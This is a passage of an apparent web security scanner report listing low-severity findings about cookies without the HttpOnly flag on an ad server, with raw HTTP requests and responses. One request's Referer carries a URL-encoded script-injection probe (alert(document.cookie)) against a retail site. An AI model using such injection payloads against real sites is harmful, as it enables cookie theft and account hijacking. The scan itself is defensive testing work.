QRKWJqVRxAnwvNGM+FpcP/8Ir28/iz06imcQMug/OgNlMKedDlT1HVV9sly7wnwNHKuJVDpVUb8NTQhrRQmDqSpJpdJn794JnJXLhivCBU0WzWeHPbOEHBIl5z45JWeVQIhp5n9Y8imWjo+voAjhA9vRU9f9UAjWnb+iNhP/VDIBqiW/h5H1lN2DlLCBlxtfP7Nth6C/TTvWSmjMT/wh0v8yJwjPizFzD5CRmiwbk981fFD7w5YAQ7KBRZwMiLN2H7rfW/kJ2not+CMUBQUZbSZUiCeNX15LwpC1UB9nhag6sjBKCHJ3qEzFNmCq59wEBQI61ewA=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J2oN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J2oN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XL8A="MLsXr98vcS5joAD3cWnZbLvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+wVZnSqvgBJz6voGf2x+1fpmGHNyJJCc8TFdOsHamNJWhf4O0G6mx0DiILH1ZGJvIbhbNj3WyjYITNbuu5a9TenNAo5w+V+jEwjMs0buh+LSM9MW0LocGLfbs2JngdI/0hoqLc+4c/4njp7KcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Fk1T3+bmy4DPWztFWhmf4YZDOa/5QfHuiA/TX71vlEf6aI/aHjCv/MxOl2MsIIxayf3UdTycXnHYI/GWT9wffWhWU0eeTJnYV3VYkfv9hZ8KsDEgeYwuYIaQ7dy+PYFN20XN9IPmBbG0qWKpaCMp6bmTsct69E="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHteb7JxbCW7w++Pj1nwUVKp5hB0gjwRK5ilR9rYtu+8vdt1RHZP3c/7mqm1m83nE+btDWInXJ8Oj/6AvXXwanym9a9EOO6FFfbKJMGot66KlgRINwareOVIA47DpDddVt41B/2lZDvlXfqyquFT/raL2+bRtNAthCPn7y62D/SpWVGx8RNgDmIj5Yq0euDif+TNGrkAuvQsi/mYwbmgPK2IOWvD2jwg0Yp1tlZNBoLMbfiex2Zl4CXC35bYVivuYYx7VVLswcQ1f1IUJRS0BV31nSjeVF9/i1bzcrkg5r6JCmXM3DqOcky83D+OCzMYAFF/KlMDverAlYjk3oFt8ANMxorn1kr7jMwpy2Bw2U0mqC8xdltTXOtatQFAz/IV4IfBXJ06eI+yumva7mqy1Wk1pMuWSGP5FzeQHic1omrIQI7nLti10sFPz45YNec6XtAETkLs4MrS7F/mWIGZs0BVWb7mIA03xQ7zaLFmmgZA12uHXVDC6gV6smrutzBGpONeRN+LLR/l/NJOPApKr4HufQlUic+onWy9BWBBBVshcAi/LnvU1deB5UtYJ5C7P5+Ir3OpuLKlHgTTGmttpgL0VyXzDTMGfmjw5nw6zHe7hT/J4H1mUfavc81BOR6/bA0W84f3ttHP+78/klTg4/21zAkMFVw4BGQZdNmIkquX4XxIwabvH1pK8WBPgdch/U/EZyOF16cXgTWxP/xYB1xLrHxBqcmkC5HQR2QiGa4uTBr7Y09xNC7YlVLARKqLG90a+1+qeX/YToe9W//bNA9k3rMcOljXmv00m0RFbXV850JXTnsHYtB7u9az8hbvzNEfdjDjskSOFAYILVnxSgKnS47RV5rbb72HpQY8E9W8iPZV2IL3+BjNqNnwC/rBme5hEvKkzrDFL4jK8+bvq2H4uQgKZnm7rHc8IvtATBeaHtmPphjkIZ5xGGkKNe8ucCb+DlloYbeDx8ip3v7KItXy99q+0Sze0BMf2PRL6MzslKqwCzgkZfyplekA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:03:24 GMT


18.191. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT7e556%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7f71559fd29&c3metrics=adcon
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_qMqw="MLsXr98vcS5joAD35amm7m19U6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5A8JFXO/Ufo3cmIgJSeR02NSTn9t1MO8LVswzpPckYe2QVv4EmTO8C0iKgipEUF3RNcwQYCZSFvbJPRT19v/MKMdz964MkYDCoFUSqyGDYc4xdA4GxrBkplFB5AeGhIizmn8lEUUdbcs3lJN28rFRcYyoTToEHMT66LkWCsjc3YWc+ZB93S+raIXVysqKDY0IvtgMk29DWlAWZW4BWaNjzyN38bZLDzhNwxrCeRE+CyNtxE4AiDffU40S/HYFDdOetylRHtE//AbHF/OYkaWsbvT4NLZ9LmfQCNgL96LKzU4WDJvfg/Rb1HztxBka97NmdI+pcMESq8+8u52JSwXLNIZml3AvIHDmrOEK3vZNv3R70o="; rsi_us_1000000="pUMdJD9HMAYYlW23lB1alXr9BmaqyZcgtsTgox7CLyoprYp1/zjRrRdkE/0saMayW1zRBctP4a5yXujYhzAElEdNdK7CI0mkkPYR1gj5x24mapoN8USxwHCM2WMbpxh9cm+zL57iMpDf1H8p/gbqz92LyFbDy/BFYosYTU7TKf6u7EPqr3IydGDFeOShu1/JIUDpjfkg4Edk5PIbLNCSQSeTTDhzePVUUZGfrGH5Cxu/vsM3KGzNRBO371taXGzGxFh2zqztPVZV7YXa6bzNIgqjNNoe7rWkrbA4Vjt3c9XKW61KPtktvgqJHzk5Bh3AvgaGUkRUZP+yM+hAZMt8J603jd60Q0TZhNXm8n+ks8dmg/qHE59bvRulWR1CXiSzhHLjeiI5QTmoHBxqTsjC19McaSaIGuqSYh9vaAi8yo5TEP2OUVHWXYRntrWXiap2xnutW+0KCQVdJhSmPlTr7EJ1SPrzlghILwb92MoYdDoIfQDF+j6TCJT9xRQxi9EGsj7UO1JnD/C1oTBqUHmYhoeO8PtD2YMdqsr2mNVrGF8eghR5JEWOK/T5ckPlzqzM1z2ystR3r9OFg5Qhn1xdD2N/pQKqMvN/irn4czwTPnZhIJa0Z9I59KJqB5jmFqGccuZ4+Tjg1SobBz8TpbEiJTsz3JNvye/HybXVKhNIV7y+IAG5mfmlZV1LeWGQ1u38GMb8Zfxuh+YxPs7mkCI3jMpB5yEaJ3JVIsKBVj4WQyD57gFE3Oug6LaOfawPEG2hxfiWsL1KpAFBwqNU1/ekU2GrMxBaGUSrd07wjWgzb5pC4yLfHN4I6a4ZMzSiG7awfcef4Os1yheJuVRrbfmVLI+TPn/I+9JsZsm9/GQc6xUOP1JXwpG3ed+RKt+Yd03eH3CzbsWwRtCT2M9rbIKl69GFNSelHu9hutJqh3z6dZyZvwsFOy6wROL19RQINcK+NubGZj0j7vCcSzRzAPMKYz8gNdWfkgSzAznl6NO1HaMthihPi3eQwvPIHj6pnTVrpbLp5p+65nt+GBHEjVSM"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qMqw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qMqw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-Xb3="MLsXr9EvcS5joBD3cWnZ721Ny4Obrb2QmbdXm6j+DYZlI1D1a3Tl+WHppXdZ0nS5KcMjiFbVdTcLf4NsCWD94zFAazjAnub/uD68oxiDDVp8H1BGXR3pIUBTO7FKyNbskdav3JIM2gk1wLDur6CcLQ4cH4N7i5ZJTv0xkwLB/Y2hf0p7l+ijugTLVyRmU6M4/Y7Pm8Z7rFLl6R55NhiwdK8AeGKycXRkK6kZZCLdhudtDlPwX1hpNjhvRGV9wQXjWeXpq2KumvYyqc6Ht45FEDRLnajtbNk3TMVytWT4Z4wi1GXZQb//Zfdfkj/gDfRRKLTWu9FTujmZ8rxf6YufR4TeMmZZOEqoB2TEOxgpmKNftUwnqldNqerushNz7sP1NAJwWHc3RbB+woe2tgL82Hi+ttN1+/QSaI8Y7+o="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lD0KtGD3t3zJfAqSy7Ec+8jGrfYp2WrTIRBqQ2OYuGWvze9j97z84TKAm1hb+FYIeamrF7K3Y1U8cGnXlXYGdQ/ngZ1luxj4l5as0KWw8B/yHhecjeZxoBUgnlB9GGHds8iQ/lnD3CR6WbZRy9PSMpX+6P2ubEDqr/IzdGDFeuxZul/JIUDpzdkA4EDkpPIbbFCSQSiXXDjzePVUVZGf7FH5Cxs//mM3K27NhBC371tUVKzH9FhGzqzuOVZpru06aa+wPhMeRB5qAXv4sVXRaZ1aJAq6k8g6SDvSPA2fHzkJfkvAwwakUkQUZPeyPOhARMt8J603jd60Q0TZjNXm8n+ks8dmg/qHE59bvRu1VRFCXiyzxA5jei4OZ4GoHBxavijC19ccaSaYGorSYi9v6Aq/DAJlKl3/UlHWXaRjJ226qmZ3rV0klB7I59RlBabm80OBvfxQ7fQE6SdhWnr9yhS3MyaPTeqAm2s9zv7oDblD5CNIG0rMwmxJc8wbakCGy6Evw2blZVaFs3q20wjMrqx67u5JPJk1/0kVkz+0TrWgXyJH97VEkiZ3H1SifbYYOZRrLHL+mr5GuWBwkY9F7vZGJK6H6CGPsNQPzkGHGQP5en5uUKG5C+2lSuIKhalpCV2gGr6MHD5vwt2RlHtoZoP5PV4xKD850cklZV1LeWGQ1u3MGMb8bfxuh+YxPs7mkCI3jMpB5SEaJ3JVLMSCVj4XQyCZ7gFE3OuwaLWOfawXUG2mxdiKsKlKrAFBxKNU1/ekU2GrMxBaGUSrd07wjWgzb5qCoyLfHN4I6aYeMzSiG7awfcef4Is1yheJuURrfdX1XI+TNu8RfdOs4V2HRhiTZGuH0G+/YPneAcl3TANQ90zt55RzVrRr1261eFkFrD92xMPFNSelGO9RutJqh1z6dZzpvwvFx+6wRfSN9RQINf7eNubGZj0j9rCcyhZkNhf14C5I0erC+gSzAznl6NO7EYVNhjBPi3WQwvPIDgKptQ3rpbT/5h+VL1lJaRShQ1Si"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:02:35 GMT


18.192. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_pmcO="MLsXr9EvcS5joBD3cWnZ721Ny4Obrb2QmbdXm6j+DYZlI1D1a3Tl+WHppf6j5AVFSd5d5palIsCVdC2pI3QRDKcvXz7Py9BdorY57yZojvegdYdOXIl/MGPBcVi6n8MbTJ5osyBT/6M9/+X5L6mLc1nYs5SV2jXdpo2+sQls8XoJmdeVE7eyevMJJ5HIav7B26tZ5qSmmArqjGJZ4EN75CrDUkT4+Hzl5viyGLHP1bWxknuo8ffl6vFjB/I0L1Jta/0sFxXU26C72J8HidttY4AmpmiDxP1KfB4UPjRwpkqxI7FuRkQ0IXos2FCqYjjGV/v0vkYiw6aq49lHlZhr0dF/JrLmASkRF/Tj96Mlc98m7IbcePDnDUTURTPCTfvl2X7FBSBnd/mjFZwQ/D0AlYbZFC6FKM17kGj34Q=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENj8P6oHVhT7jqMSpxsBzahcGEwZlXdHqk2MHqUdc4h3G8jE1Gdx1SeuNf4n9Fd5chSGk4X4xYR9YkhtFwZ+EHmv2SB4fyZw5G6THRTVZKv9ZwN6fwAWYFRtpUsNW157VuVbEpV0+yQekUeVSpbwwQSdwTnHVV8AsB2zQOl6eKXyDV7k0t934W495Zf/o7gHjSLAOxqyxyXw+9CmcNbXG6N7hoJm4J7kZ4vUmh+PSIuCRUe508n6BeQjsnrCt3LcS2/139vz1JtNkjTO470dJ9YguxeImHkN6Om3dZ/y1uHbCiFbDWKJiXon0hVx8mexPKq95vTZwPLQFx7xKmx6AQgk1m73VQmS5mAwCZYr/rnlUziGLpZS7eGyLCV1VbKUdSonwsz4lZAPJ/K/e//SO2u7mNklWLo/8EjqDEPfaBVzOHevRBG6rRWhRdhEAi6uDWWbpBpDxa1t1hS9Usa1+hN5yLHExi4tP6ZyZo16fFMiWyUwl3JFN1GGI4I00kUjYd/bB7OIUFfDovyYO7TEruQGgF0MW1h4hDC0hXbwGTSf7MI/OdlGYvPLTH9bhwS8ub7GIRnD/tkfYF8QGGd+RiBGrGquaHj9IXOvOSOsOYguBuNV2KNiNHKRYMkv+rKhQY3JEdgzwRYK6ralqzqevubJ5Mi8u2RA2JC3pQufU9327VyPA6dfQvCZAlM5/Afr3eWtgPtDeb2T01bWnfngDV5H/I6mmkzMuQtNQsRIKedDlb1G54uTB77Y09xNC9XEUPAS6L7ChVa61+qfp/YKZa9KAHZjJXL9CvGBkwezmdjPbOLlC0lGDb1816hJChMWzSO8h92z4uvpAjhA9vRU5f9UAjWnb+jNhP/VDoBsjWPhJn1lP2DlLCBd/tfP7ttu6nQy/rBme5hEvKkzqDFL4jK8+7vu2+xigRaZd81bFD7xJYAU7KxZZwMiLN2HLrfW/kp1bot+A8UFQV5bSZUiCOJVh9YPho6HhTFLLH6caSAznpWK1NHQINiZqOUh8XGxfBg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pmcO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pmcO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uSRy="MLsXr08uMT5n4BD34E0aD3mU57KuyceV04R4MLubjL+IMGzosHZKWwRtA6OgFEiMTEHmonwA5mnMcoNiPWD9pzbuj7m3W9LeorY57yZojvegdYdOXIl/MGPBcVi6n8cayZ9ss4hjh79CKFc4HIN1bbTUf/N6XW+2nvaBgdzaQo3KELgZUAGAaK7xgwa46LVQp5vnTosH/Ng/dv/wp5HopVk2YhKyoWWlOUwXUI/XHrIj+eEFssu8rch61LPNWZn4aSkmVd2vw40AOpjHFKLuAWijaAQsUrJ9Z9ldVKplBpWWfQl5k//BWPZOof8fAdS04KgilPjAuIECV921+ZmyD8F2J4MFaMQYQ5VLkgCwK5k1whxQdtJFemZCtiRe7wcOgTjZPnG2NBbH8c+yxz6zEB3Z8SJJM9tpfxj1mQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENjvht1yj1FbKuYNtLk7r+gePMvUp30nzQSa1YUcsKXGQ02IAcpR9TattCy1ZV/af3UntXFMcTHLwgRLgVdrk3Un+lJb33t0N7Cx1bS95yIeZFtkPXSC2LxBpOy6MQjM+vzFlErEYPBt+vGOrvKjBgqk7FujcFVpARpHpVR1q4GJegXgZqGCY54QmztWtEgF5dKMZ5FaJmdNUKntAp+ukjNGGBoXCGGOXvT2jwg0YZ1hh5NB4LPjfce11Zs47kF067qv8TvAg9c+Aee7V0LEq8tTK5HexDea4RBbmP/+1J6oen4716Cs3gAqqKQswryD7D0JvXmMlGWhpSwxUTrHW7dJdSHaH16bpTamtxox++wKGkZ6ImvrC+TNTrbLp2/Dq/p+lDIBJcw6qT/KNiBIX2G56mABa0j4wO6uBL41z+QLic3pmrISI7nLthF3ME8z47QNec6XlMETkLo6MrC7F/mWIGZg0CVWb7mYC03xR7/aL1kmgRDKA5SMvZHC0hnfxN0S51n1k6GuY8eUueiKrtjErlgWEC3x6ewVprlyC0l71UwwLIA5htfM3NSPvn9i87H067rPIEGY8qbCYCFHAfTGmttpwL0FyXzDTPmfntw5nw6z4+7hs/J5H1mUgavdn8JIblxuAeog7UcRk9DemSwV/y09U2NGIcrD+sqsGoZDN3UWO5+0KGL9f9QNzBElk3X3Ai6g8GVX6H/MWwkNGUNFDtd6obw7pNlBxlwXMJnubQMXDK3ND+JebJ0xVW/yxudKCyXa+9cciv317TM/ni5/hC1CmqcpJFELhdKYLLRKYJacJjuNIRoc/tOewx73YZOegpVOEk7VyLuTqF+YhKHwKMnWDNmhjQN6qiMvRONtcMmvY+4wcyCpJRJguD5sT4t9/ajdLpFZp+UoAU3iXLPuqgxXL7MbFIyV4lXfG0mJRy4QiVdaaImfePNtK0D9Cb6lA6iM9elAsSAG4fSqpXh73iqoG4AycUoKkea+muMjDVJ2KMQ3HlM2RncdZmXdY/A=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:03:07 GMT


18.193. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/how-it-works/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; 